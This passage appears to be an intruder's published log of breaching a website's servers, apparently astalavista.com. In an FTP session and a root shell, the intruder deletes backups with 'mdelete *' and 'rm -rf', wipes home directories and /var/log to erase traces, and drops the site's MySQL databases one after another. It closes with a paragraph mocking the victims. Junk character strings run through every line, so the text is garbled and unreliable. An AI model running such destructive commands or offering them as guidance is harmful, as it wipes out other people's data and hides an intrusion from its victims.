, r& n3 o6 I G& l8 G9 `-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz20 K' W- {7 ?% e+ `5 V
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz26 P/ H) B# |! [9 l9 w5 J3 z5 q
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
6 v# |; v$ ?8 Q9 V-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar/ P, [! V3 C6 l6 P
[snip]
# ]7 A7 F2 Z0 V* r' k: p226 Transfer complete./ x* f+ o. w2 K0 p4 I
ftp> mdelete *
8 L5 e: }& n& {* Fftp> ls -la( u' E3 Y4 Z& k6 `
227 Entering Passive Mode (212,254,194,163,2,193)* f( X; c( `& c1 q$ N
150 Opening BINARY mode data connection for ‘file list’.
! s! O3 L4 E1 f1 Z; `3 g( W' ^226 Transfer complete.& F; K: u6 ~- p
ftp>2 L& X! G3 T/ y( @: D* M, F
9 e3 N( {3 H; Jsh-3.2# cd /home, e/ V4 w6 T9 J4 g; C, Y. Q
sh-3.2# ls -la0 C1 ~4 Z/ ~. S& r6 o7 G
total 120& m/ I; t* ~' h# h4 q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
( ~1 d0 U8 c& R$ ?; k2 Odrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..: A2 X) e+ \* x/ i
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin$ x" z/ O, X! n- j. v* M
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group, K* ^$ S6 o. k' l9 {# q7 M3 d5 g
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
6 f+ h8 f/ R0 i& udrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet8 H3 a7 w. z |3 a, X
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
. ~" @; U3 [; U) h7 vdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141610 e L# v9 t2 |: E
drwx–x–x 10 com com 4096 Apr 28 12:40 com
$ e. c/ U k4 n) l Ndrwxr-xr-x 2 root root 4096 May 17 2007 ftp5 b; M9 K! |. H& r& ` c3 C
drwx—— 3 jon jon 4096 Sep 21 2007 jon
" `5 e/ B! i3 f) u. sdrwx—— 2 root root 16384 Sep 11 2007 lost+found, ?3 X+ f f& d; x. ^/ p
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
1 f2 u) Y3 n6 q% H. tdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata% F! _1 ^+ n; U: ?7 @1 P+ U
drwx—— 2 jon jon 4096 Sep 15 2007 test4 f; W1 U( n! e8 V: K) K% }$ A* k
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp9 d+ U" t. f$ |0 ?. R
- @8 `+ ] d) T
sh-3.2# rm -rf backup/
. T! X8 N* B- Q) i0 d; Lsh-3.2# rm -rf backup.14161/
- m( Y3 a; h( c! |sh-3.2# rm -rf ftp/
. D9 e' @' }. ?& f" w% E7 z1 Wsh-3.2# rm -rf jon/
% a6 ]1 H1 v9 T. bsh-3.2# rm -rf my/6 }* j$ x/ @* S; [/ Z7 a' H2 q1 K/ s+ N
sh-3.2# rm -rf mysqldata/7 f0 x! q) f$ e+ {% Z' I# M8 L5 {9 L
sh-3.2# rm -rf test/
. h: D( `2 G/ @% fsh-3.2# rm -rf tmp/( O, Z2 O: d3 K/ X' \( a5 U) L
sh-3.2# cd ~
; [6 j2 _0 m5 ]2 I0 d# fsh-3.2# rm -rf *
, c6 L- \( w3 g3 Bsh-3.2# rm -rf /var/log/
8 ?7 E- V) {9 Y& A: q) Rrm: cannot remove directory `/var/log//proftpd’: Directory not empty
5 s+ ?5 Z- N) Vsh-3.2# rm -rf /home/*& a M4 Z8 V5 W4 ^. S$ ]
sh-3.2# mysql
+ f6 ^- m- Y" H l$ T/ S" fWelcome to the MySQL monitor. Commands end with ; or \g.
! M1 Q+ Q2 y, j D! S2 W# Y4 fYour MySQL connection id is 407156+ C. i* t% M# ^3 k- z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
5 g& ?( N2 S5 g5 G/ N5 i" S% N' d; x% G3 y1 U- S# Z
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 y+ B' ]! R8 B0 T3 M- N* v4 ]9 T
6 ]& b" f8 j/ P1 e4 u- Omysql> show databases;* y; {; ~" [# r/ v, |. Z
+———————–+
+ W) l* m$ @. `| Database |
3 y( Q7 [7 N! z6 k! a1 P+———————–+! v T/ i2 E4 v& B7 Y( x& k
| information_schema |
9 F1 F* L, F8 D% J# E' L| astanet_ads |
1 P1 x9 h9 W' Y| astanet_mailing_lists |# \' ^. M; i8 g% k% |* ^. m
| astanet_mediawiki |) S& Z5 ]% ~+ X) h* W9 ]# W' f6 P
| astanet_membersystem |
- ]- y! w0 M- z( z| com_contrexx |; U# q2 X; [6 `) b. y0 U! X
| com_contrexx2 |
+ B' J+ E- z8 i2 v* J0 T| com_contrexx2_live |4 e" U, E! @, ^( c- l) v0 d
| da_roundcube |: i% F$ v$ E, u6 m/ }
| dolphin |1 {9 K- Q" v2 [+ m$ D
| ideapool |& z+ k! t J+ g1 W$ H# k" _! n
| mysql |
+ K: S: y3 M% D, o" F( I* p| test |' i9 M# A* W6 w4 p/ r
| yourmaster |
5 ]; Z) j# e$ a+———————–+
, E+ f8 d0 p' @/ z! k/ ~+ H14 rows in set (0.03 sec)
; l) n" R( o! o* r% @$ h+ L# h# m0 R) a9 f0 u, N8 H; l1 Y2 G/ A
mysql> drop database astanet_membersystem;! P, ~; d5 a$ ^( C1 _
droQuery OK, 46 rows affected (0.81 sec)
+ }: [) e0 k) L+ x* E4 V" K) G# {+ o' |/ |. b) a% N
mysql> drop database com_contrexx;+ ^- j4 s! d2 U3 z0 J+ z
Query OK, 211 rows affected (2.72 sec)+ z i0 Z8 d1 ]1 x; F4 l: M
' ^, o3 r2 S0 e! p2 l( i2 I
mysql> drop database com_contrexx2;
/ v7 z/ n, z/ ~0 {$ O/ O" c$ lQuery OK, 237 rows affected (2.23 sec)5 w7 U0 v. ~7 }$ q, b' R
1 z6 K% I. v Y* y6 e
mysql> drop database com_contrexx2_live;9 e8 k. y2 S* r1 ~/ K6 X
Query OK, 227 rows affected (7.63 sec)* M( o4 {+ y0 C/ ^9 h: m3 }
. P! g! ~. K/ {( S2 G6 l' Ymysql> drop database ideapool;- {3 _" A$ f8 b: E A; Z+ Q
Query OK, 69 rows affected (0.19 sec), m. W! k! [! X. b3 j/ Q
: b. P3 [8 A1 X: cmysql> drop database yourmaster;" z2 K$ ^9 ~4 w. o4 F" H
Query OK, 158 rows affected (0.55 sec)0 F; M" R' Y" `9 M, L
$ L0 u2 P" _1 j4 P8 W+ G$ o
mysql> drop database astanet_ads;+ U2 ]$ e7 k% x
Query OK, 9 rows affected (0.11 sec)! q$ p+ G9 G" `/ `1 B- k! f
' |, v$ s. d! J, ^mysql> drop database astanet_mailing_lists;
. Z! O4 S3 H+ `Query OK, 24 rows affected (1.47 sec)
5 |* g8 _$ j' P9 q' u+ I+ a, A6 t
mysql> drop database astanet_mediawiki;' i2 s: ~2 Q! `& D
Query OK, 31 rows affected (0.51 sec)6 Z4 A# Q$ f: o+ a6 j# Z J3 w
: d# x, P# h* h: q) f! u
mysql> show databases;
% E4 L" D( q, m/ W# i+——————–+
! {, S! p9 A9 }: ^% Y2 ^| Database |$ s0 A4 @$ x7 P0 n
+——————–+
" [2 P' H8 j( c' S! H| information_schema |
1 R. y/ X4 H6 p0 l' I| da_roundcube |
% }" L, n! K* T6 \& H5 t2 e. O| dolphin |# [4 A6 `$ U; B
| mysql |
! f- v3 ^( ^+ g, V2 O9 t' z" P/ ]| test |
# }) h& X0 y0 ]; F+——————–+
6 X, ^, u: w" C3 z$ M6 n8 _4 Z- k5 rows in set (0.00 sec)6 T1 z7 k: `1 E5 H0 i
O6 Z$ B' R, A7 [, r; }
What a journey! We’re not sure exactly why the “Terminator” had any influence on
/ k& f( w# d' R' H; ] f; atheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the3 ]' W. A: \, |) n4 J$ u( T' E# q
wrong to say this pack of morons *wont be back*.
2 u% v; R4 t1 X& h+ T* W/ T- P" |" P |